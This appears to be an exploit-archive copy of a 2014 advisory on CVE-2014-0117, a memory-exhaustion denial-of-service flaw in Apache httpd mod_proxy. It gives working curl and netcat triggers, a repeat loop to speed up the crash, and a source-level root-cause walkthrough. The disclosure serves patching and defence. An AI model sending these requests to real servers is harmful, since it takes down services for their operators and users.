Apache 2.4.x mod_proxy Denial Of Service



EKU-ID: 4168 CVE: 2014-0117 OSVDB-ID:
Author: AKAT-1 Published: 2014-07-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


    :::    :::::::::    :::     :::::::: :::    :::::::::::::  :::    :::::::::::::::::::::::::::::::::: :::::::::  
  :+: :+:  :+:    :+: :+: :+:  :+:    :+::+:    :+::+:         :+:    :+:    :+:        :+:    :+:    :+::+:    :+: 
 +:+   +:+ +:+    +:++:+   +:+ +:+       +:+    +:++:+         +:+    +:+    +:+        +:+    +:+    +:++:+    +:+ 
+#++:++#++:+#++:++#++#++:++#++:+#+       +#++:++#+++#++:++#    +#++:++#++    +#+        +#+    +#++:++#+ +#+    +:+ 
+#+     +#++#+      +#+     +#++#+       +#+    +#++#+         +#+    +#+    +#+        +#+    +#+       +#+    +#+ 
#+#     #+##+#      #+#     #+##+#    #+##+#    #+##+#         #+#    #+#    #+#        #+#    #+#       #+#    #+# 
###     ######      ###     ### ######## ###    #############  ###    ###    ###        ###    ###       #########  

 :::::::: :::     :::::::::::::       ::::::::  :::::::   :::    :::             :::::::   :::    :::::::::::::: 
:+:    :+::+:     :+::+:             :+:    :+::+:   :+::+:+:   :+:             :+:   :+::+:+:  :+:+::+:     :+: 
+:+       +:+     +:++:+                   +:+ +:+  :+:+  +:+  +:+ +:+          +:+  :+:+  +:+    +:+       +:+  
+#+       +#+     +:++#++:++#  #++:++    +#+   +#+ + +:+  +#+ +#+  +:+  #++:+++  #+ + +:+  +#+    +#+      +#+   
+#+        +#+   +#+ +#+               +#+     +#+#  +#+  +#++#+#+#+#+#+        +#+#  +#+  +#+    +#+     +#+    
#+#    #+#  #+#+#+#  #+#              #+#      #+#   #+#  #+#      #+#          #+#   #+#  #+#    #+#    #+#     
 ########     ###    ##########      ########## ####### #######    ###           ####### ##############  ###     

+:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+:++:+:+:+:+:+
+#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+#++#+#+#+#+#+


Hi there,

Software: apache httpd 2.4.7 , possibly others from 2.3 and 2.4 branches.

If apache is configured with mod_proxy module (for example in front of
a tomcat, or proxypassing requests to other backend servers), it is possible
to use all available memory on the server and potenatially cause an OOM
condition that requires a reboot. In our tests, a single requests was causing
apache to spin and keep allocating memory (gigabytes in seconds). A simple bash
script that does this X time can speed the process up.

Bug can be triggered in request or response.

PoC (request):
-- cut --
curl -H 'Connection: ;' http://127.0.0.1/
-- cut --

PoC (response):
printf "HTTP/1.1 200 OK\r\nConnection: ;\r\n\r\n" | nc -l -p 80


Example config to replicate it, in httpd.conf :
-- cut --
<Proxy balancer://mycluster>
  BalancerMember http://127.0.0.1:8100
</Proxy>
ProxyPass / balancer://mycluster
-- cut --

then listen on port 8100 :
-- cut --
nc -l -p 8100
-- cut --

Then send a request with "Connection: ;" header and watch the memory usage.
-- cut --
curl -H 'Connection: ;' http://127.0.0.1/
-- cut --

Single request will usually get killed with the following message:
-- cut --
[crit] Memory allocation failed, aborting process.
[core:notice] [pid 3205:tid 139786428621120] AH00051: child pid 4212 exit signal Aborted (6), possible coredump in
-- cut --

hence it may be more visible  on machines with huge ram by running more requests, ideally
concurrently but this should do as well for demonstration purposes:
-- cut --
for i in `seq 1 100` ; do curl -m 1 -H 'Connection: ;' http://127.0.0.1/ ; done 
-- cut --


Now where the problem is : incorrect parsing in find_conn_headers , it only moves 
the pointer when it encounters a comma, and calls ap_get_token which returns an empty
string as it skips over ';'. 


// key == 'Connection'
// val == ';'

static int find_conn_headers(void *data, const char *key, const char *val)
{
    header_connection *x = data;
    const char *name;

    do {
        while (*val == ',') {                  // jump over expected comma separator
            val++;               
        }
        name = ap_get_token(x->pool, &val, 0); // returns empty string in our case 
        if (!strcasecmp(name, "close")) {      // not mached, branch not taken
            x->closed = 1;
        }
        if (!x->first) {                      // branch taken 
            x->first = name;                  // "" as name is empty 
        }
        else {                                // branch not taken due to above 
            const char **elt;
            if (!x->array) {
                x->array = apr_array_make(x->pool, 4, sizeof(char *));
            }
            elt = apr_array_push(x->array);
            *elt = name;
        }
    } while (*val);                        // val is still ';'

    return 1;
}

/* Retrieve a token, spacing over it and returning a pointer to
 * the first non-white byte afterwards.  Note that these tokens
 * are delimited by semis and commas; and can also be delimited
 * by whitespace at the caller's option.
 */

AP_DECLARE(char *) ap_get_token(apr_pool_t *p, const char **accept_line,
                                int accept_white)
{
    const char *ptr = *accept_line;
    const char *tok_start;
    char *token;
    int tok_len;

    /* Find first non-white byte */

    while (apr_isspace(*ptr))
        ++ptr;

    tok_start = ptr;                          // ';'

    /* find token end, skipping over quoted strings.
     * (comments are already gone).
     */

    while (*ptr && (accept_white || !apr_isspace(*ptr))
           && *ptr != ';' && *ptr != ',') {   // not satisfied as ';'
        if (*ptr++ == '"')                    // skips the if itself
            while (*ptr)
                if (*ptr++ == '"')
                    break;
    }

    tok_len = ptr - tok_start;                    // 0
    token = apr_pstrndup(p, tok_start, tok_len);  // token = ""

    /* Advance accept_line pointer to the next non-white byte */

    while (apr_isspace(*ptr))                    // not a space
        ++ptr;

    *accept_line = ptr;
    return token;
}


We hope you enjoyed it.

Regards,
Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466